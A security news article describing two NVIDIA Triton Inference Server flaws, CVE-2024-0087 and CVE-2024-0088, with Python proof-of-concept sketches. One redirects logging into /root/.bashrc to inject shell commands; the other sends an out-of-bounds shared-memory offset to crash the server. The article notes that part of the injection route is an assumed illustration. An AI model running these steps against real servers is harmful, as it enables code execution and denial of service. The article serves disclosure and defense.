NVIDIA Triton Server Flaws Let Attackers Execute Remote Code


Two critical vulnerabilities have been discovered in NVIDIA’s Triton Inference Server, a widely used platform for serving AI models in production.

These vulnerabilities, CVE-2024-0087 and CVE-2024-0088, pose severe risks, including remote code execution and arbitrary address writing, potentially compromising the security of AI models and sensitive data.

The first vulnerability, CVE-2024-0087, involves the Triton Server’s log configuration interface.

The /v2/logging endpoint accepts a log_file parameter, allowing users to set an absolute path for log file writing.
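As a point of reference, here is roughly what such a request might look like in Python; the deployment address and log path are placeholders, and only the log_file field described above is shown.

```python
import requests

# Hypothetical Triton deployment; the HTTP service listens on port 8000 by default.
TRITON_URL = "http://triton.example.internal:8000"

# Routine use of the logging interface: direct Triton's log output to a
# chosen absolute path via the log_file parameter.
resp = requests.post(
    f"{TRITON_URL}/v2/logging",
    json={"log_file": "/tmp/triton_server.log"},
    timeout=10,
)
print(resp.status_code, resp.text)
```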

Attackers can exploit this feature to write to arbitrary files, including critical system files such as /root/.bashrc or /etc/environment.

By injecting malicious shell commands into these files, attackers can achieve remote code execution once the tampered files are loaded, for example when a root shell next sources .bashrc.

Proof of Concept

A proof of concept (POC) demonstrates the exploitability of this vulnerability.

An attacker can write a command to a critical file by sending a crafted POST request to the logging interface.

For instance, redirecting log output into /root/.bashrc and then confirming that an injected command executes demonstrates the potential for severe damage.
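The chain can be sketched as follows. The target address is a placeholder, and the injection vector shown, a bogus model name that the server echoes into its error log, is an assumption for illustration; the published proof of concept is not reproduced here.

```python
import requests

TRITON_URL = "http://triton.example.internal:8000"   # hypothetical target


def redirect_log(path: str) -> None:
    """Step 1: point Triton's log_file at a file that a root shell will later source."""
    requests.post(f"{TRITON_URL}/v2/logging", json={"log_file": path}, timeout=10)


def plant_payload(command: str) -> None:
    """Step 2: get attacker-controlled text into the log output.

    One hypothetical route is an inference request for a nonexistent model
    whose name contains the payload; if the server echoes the name into an
    error log line, that line now lands in the redirected file.
    """
    requests.post(f"{TRITON_URL}/v2/models/{command}/infer", json={}, timeout=10)


if __name__ == "__main__":
    redirect_log("/root/.bashrc")
    # Step 3: any syntactically valid shell line written into .bashrc runs the
    # next time root starts an interactive bash session, e.g. this marker command.
    plant_payload("$(id > /tmp/triton_poc)")
```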

CVE-2024-0088: Inadequate Parameter Validation

The second vulnerability, CVE-2024-0088, stems from inadequate parameter validation in Triton Server’s shared memory handling. This flaw allows arbitrary address writes during the handling of inference output results.

An attacker can cause a segmentation fault by manipulating the shared_memory_offset and shared_memory_byte_size parameters, leading to potential memory data leakage.


Proof of Concept

A POC for CVE-2024-0088 involves registering a shared memory region and then making an inference request with a malicious offset.

This results in a segmentation fault, demonstrating the vulnerability’s impact on the server’s stability and security.
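A minimal sketch of that flow, using Triton’s HTTP API directly, is shown below; the target address, the shared memory key, the model name simple, the tensor layout, and the offset value are all illustrative assumptions.

```python
import requests

TRITON_URL = "http://triton.example.internal:8000"   # hypothetical target
REGION = "poc_region"

# Step 1: register a system shared-memory region. The key must refer to a
# segment that already exists on the server host; "/poc_shm" is a placeholder.
requests.post(
    f"{TRITON_URL}/v2/systemsharedmemory/region/{REGION}/register",
    json={"key": "/poc_shm", "offset": 0, "byte_size": 64},
    timeout=10,
)

# Step 2: run inference on a deployed model (the name and input layout are
# placeholders) and map an output into the region with an offset far beyond
# its 64-byte size. Insufficient validation of shared_memory_offset and
# shared_memory_byte_size is the issue tracked as CVE-2024-0088, and an
# out-of-bounds value can crash the server with a segmentation fault.
infer_body = {
    "inputs": [
        {"name": "INPUT0", "shape": [1, 16], "datatype": "INT32",
         "data": list(range(16))},
    ],
    "outputs": [
        {"name": "OUTPUT0",
         "parameters": {
             "shared_memory_region": REGION,
             "shared_memory_byte_size": 64,
             "shared_memory_offset": 0xFFFFFFFF,   # deliberately out of bounds
         }},
    ],
}

resp = requests.post(f"{TRITON_URL}/v2/models/simple/infer", json=infer_body, timeout=10)
print(resp.status_code, resp.text)
```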

Implications and Industry Response

The discovery of these vulnerabilities highlights the critical need for robust AI security measures.

Exploiting these flaws could lead to unauthorized access, data theft, and manipulation of AI model results, posing significant risks to user privacy and corporate interests.

Companies relying on Triton Server for AI services must urgently apply patches and enhance security protocols to mitigate these threats.

As AI technology advances, ensuring the security of AI infrastructure is paramount.

The vulnerabilities in NVIDIA’s Triton Inference Server are a stark reminder of the ongoing challenges in AI security, necessitating vigilant efforts to protect against potential exploits.



